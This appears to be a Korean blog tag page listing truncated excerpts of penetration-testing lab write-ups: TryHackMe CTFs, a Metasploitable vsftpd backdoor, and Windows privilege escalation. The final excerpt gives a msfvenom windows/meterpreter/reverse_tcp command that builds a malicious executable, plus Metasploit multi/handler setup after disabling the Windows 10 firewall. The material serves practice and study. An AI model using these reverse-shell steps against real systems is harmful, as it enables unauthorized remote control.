msfvenom 4

TryHackMe | Relevant - OSCP 챌린지

TASK 1 Pre-Engagement Briefing  TASK 1 설명을 해석하자면 고객이 생산 환경 출시를 일주일 앞두고 침투 테스트를 요청했습니다. 다음과 같은 작업 범위가 있습니다:제공된 가상 환경에 대한 평가를 수행해야 합니다.최소한의 정보를 제공하며, 공격자의 관점(블랙박스 테스트)에서 진행해야 합니다.두 개의 플래그(User.txt, Root.txt)를 확보해야 합니다.수동적 공격을 우선적으로 시도하며, 모든 취약점을 찾아 기록해야 합니다.발견된 플래그를 대시보드에 제출해야 하며, 오직 할당된 IP 주소만 범위 내에 포함됩니다.모든 취약점을 찾아보고 보고해야 합니다.OSCP 시험 규칙처럼 되어있다 이번 CTF 로 공부좀 빡세게 해야겠다 PortScannmap -sV -sC -A 10.10...

TryHackMe | CTF 2024.10.20

KALI LINUX 칼리 리눅스 | metasploitable2 모의해킹

metasploitable3 환경 NMAP 스캔 및 취약점 nmap -sV -sC [IP]   취약점 설명 vsftpd 2.3.4 backdoor 백도어(backdoor) 취약점 이므로 원격으로 접속해 권한을 취득하거나 악성코드를 실행하는 방법이다 https://nordvpn.com/ko/blog/backdoor-attack-meaning/?srsltid=AfmBOopga12Kggkqj5drBUuLytCdgrjoH8eh7mYpK8GbvJ-_NYPht8v5 백도어 공격이란 무엇인가요?백도어는 일반적으로 컴퓨터, 제품, 모바일 장치 등에서 정상적인 인증 또는 암호화를 우회하는 접근 액세스입니다. 하지만 이러한 액세스를 악용하는 백도어 공격은 많은 사람을 위험에 빠뜨nordvpn.com  set RHOSTS ..

TryHackMe | Windows PrivEsC 모의해킹 Task1,Task2

TASK 1 Deploy the Vulnerable Windows VM설명현재 이 랩은 다양한 권한 상승을 소개하는데 중점을 두고있습니다 Tib3rius 가 만들었고 Windows Privilege Escalation for OSCP and Beyond 중점을 둔 랩이라고 보시면 됩니다 RDP는 포트 3389에서 사용 가능해야 합니다 (서비스가 시작되기까지 몇 분이 걸릴 수 있습니다). "user" 계정으로 로그인하려면 비밀번호는 "password321"입니다 xfreerdp /u:user /p:password321 /cert:ignore /v:[IP]위와같이 들어가시면 됩니다 TASK 2  Generate a Reverse Shell Executable설명  오케이 좋습니다 이제 msfvenom 모듈을..

TryHackMe | CTF 2024.09.08

KALI LINUX | 윈도우 10 모의해킹 Reverse_tcp

Metasploit & msfvenom 활용해 윈도우 10 모의침투.윈도우 10 방화벽 설정 설정관리 메뉴 클릭 이와 똑같이 다 끄기 Msfvenom 설정아래와 같이 작성 msfvenom -p windows/meterpreter/reverse_tcp LHOST=자신의 IP LPORT=4444 -f exe > 파일이름.exe  이런식으로 뜨면 성공 !  msfvenom 으로 만든 악성파일이 보임. Metasploit 설정 메타스플로잇 실행 모듈 설정 msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp  msf6 exploit(multi/handler) > set payload /windows/meter..